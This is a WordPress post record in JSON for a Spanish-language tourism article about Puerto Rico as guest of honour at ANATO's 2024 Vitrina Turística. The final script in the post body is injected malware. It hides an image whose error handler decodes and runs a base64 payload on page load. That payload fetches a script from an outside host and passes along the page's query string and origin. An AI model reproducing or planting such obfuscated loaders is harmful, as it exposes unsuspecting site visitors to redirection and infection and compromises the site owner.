{"id":7344,"date":"2023-09-19T09:13:20","date_gmt":"2023-09-19T12:13:20","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7344"},"modified":"2025-08-13T15:53:39","modified_gmt":"2025-08-13T18:53:39","slug":"puerto-rico-el-destino-internacional-invitado-de-honor-en-la-version-43-de-la-vitrina-turistica-de-anato","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7344","title":{"rendered":"Puerto Rico, el destino internacional invitado de honor en la versi\u00f3n 43 de la Vitrina Tur\u00edstica de ANATO"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-vivid-green-cyan-background-color has-background\"><em>Entre enero y julio de 2023 han salido 8.791 colombianos hacia Puerto Rico<\/em><\/h3>\n\n\n\n<p>Puerto Rico, considerada una de las joyas del Caribe por sus incre\u00edbles playas, bosques tropicales y una rica herencia cultural, ser\u00e1 el destino internacional invitado de honor en la versi\u00f3n 43 de la Vitrina Tur\u00edstica de ANATO que se llevar\u00e1 a cabo el 28, 29 de febrero y 1 de marzo de 2024, evento comercial que, desde 1982, se ha ido consolidando como el m\u00e1s importante del turismo en Colombia y referente en Latinoam\u00e9rica.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"383\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-1024x383.jpg\" alt=\"\" class=\"wp-image-7315\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-1024x383.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-300x112.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-768x288.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-1536x575.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-696x261.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-1068x400.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-1122x420.jpg 1122w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-320x120.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-480x180.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n-800x300.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/09\/359513578_604200811827180_8977273265522038845_n.jpg 1923w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\"><strong><em>Publicidad<\/em><\/strong><\/figcaption><\/figure>\n<\/div>\n\n\n<p>\u201cRecibimos con mucha alegr\u00eda la noticia de que Puerto Rico sea elegido, por segunda vez como el destino internacional invitado de honor. Ser\u00e1 una excelente oportunidad para que los visitantes de la Vitrina conozcan toda la oferta tur\u00edstica que tiene este incre\u00edble lugar\u201d, coment\u00f3 Paula Cort\u00e9s Calle, presidente ejecutiva de ANATO.<\/p>\n\n\n\n<p>Por su parte, Carlos Mercado Santiago, director ejecutivo de la Compa\u00f1\u00eda de Turismo de Puerto Rico indic\u00f3 que, \u201cNos complace de sobremanera que Puerto Rico haya sido seleccionado como destino internacional invitado de honor de la cuadrag\u00e9simo tercera edici\u00f3n de ANATO. &nbsp;El Gobierno de Puerto Rico contin\u00faa realizando esfuerzos para expandir la presencia de Puerto Rico en el mercado latinoamericano y este reconocimiento provee un excelente foro para dar a conocer las cualidades \u00fanicas y excelencia que ofrecemos como destino de ocio y negocios\u201d.<\/p>\n\n\n\n<p>Con base en datos de Migraci\u00f3n Colombia, ANATO calcula que entre enero y julio de 2023 han salido 8.791 colombianos hacia Puerto Rico, lo que significa que los connacionales ven a la isla como uno de sus destinos favoritos para sus vacaciones. La demanda de viajes entre ambos destinos ha redundado en que se aumenten las frecuencias de vuelos entre las ciudades de Bogot\u00e1 y San Juan y la creaci\u00f3n de una ruta entre Medell\u00edn y San Juan. &nbsp;<\/p>\n\n\n\n<p>ANATO calcul\u00f3 que, en agosto de 2023, hubo 11 frecuencias semanales entre Bogot\u00e1 y San Juan, lo cual son 7 frecuencias m\u00e1s que las registradas en el mismo mes de 2022.<\/p>\n\n\n\n<p>\u201cCreemos en el gran potencial que tiene Puerto Rico y estamos convencidos que la Vitrina Tur\u00edstica ser\u00e1 un espacio ideal para que los diferentes actores de la industria del turismo conozcan este destino del Caribe, adem\u00e1s de fortalecer lazos binacionales, se incentive la apertura de nuevas rutas y se mejore la operaci\u00f3n de m\u00e1s frecuencias a\u00e9reas\u201d, afirm\u00f3 la jefe gremial.<\/p>\n\n\n\n<p>Puerto Rico, un destino m\u00e1gico cargado de historia.<\/p>\n\n\n\n<p>Considerada como la Isla del Encanto, Puerto Rico es conocido en el mundo por ser un para\u00edso tropical que combina hermosas playas blancas y una naturaleza ex\u00f3tica con una arquitectura colonial de m\u00e1s de 500 a\u00f1os.<\/p>\n\n\n\n<p>Entre sus atracciones turistas m\u00e1s llamativas est\u00e1 visitar el Viejo San Juan, un lugar conformado por calles adoquinadas, bordeas de coloridas casas y castillos antiguos que deslumbran a todos sus visitantes.<\/p>\n\n\n\n<p>Tambi\u00e9n se destacan sus destinos ecol\u00f3gicos, como la exploraci\u00f3n de cuevas, cascadas, islas, toboganes naturales, parques y sus bosques cargados de fauna y flora. &nbsp;En dichos lugares, los turistas pueden realizar diferentes actividades deportivas y recreativas.<\/p>\n\n\n\n<p>Por otro lado, Puerto Rico ofrece a sus visitantes la posibilidad de hacer cruceros, navegar en veleros y hacer excursiones en barco alrededor de la isla.<\/p>\n\n\n\n<p>\u201cSin lugar a dudas, Puerto Rico tiene mucho por ofrecer a los turistas y seguramente se convertir\u00e1 en un lugar lleno de oportunidades de negocio. Por tal motivo, la Vitrina Tur\u00edstica de ANATO ser\u00e1 id\u00f3nea para que este destino se posicione como uno de los m\u00e1s importantes de la regi\u00f3n\u201d, concluy\u00f3 la presidente ejecutiva de ANATO.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Entre enero y julio de 2023 han salido 8.791 colombianos hacia Puerto Rico Puerto Rico, considerada una de las joyas del Caribe por sus incre\u00edbles playas, bosques tropicales y una rica herencia cultural, ser\u00e1 el destino internacional invitado de honor en la versi\u00f3n 43 de la Vitrina Tur\u00edstica de ANATO que se llevar\u00e1 a cabo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7345,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-7344","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7344","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7344"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7344\/revisions"}],"predecessor-version":[{"id":10307,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7344\/revisions\/10307"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7345"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7344"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}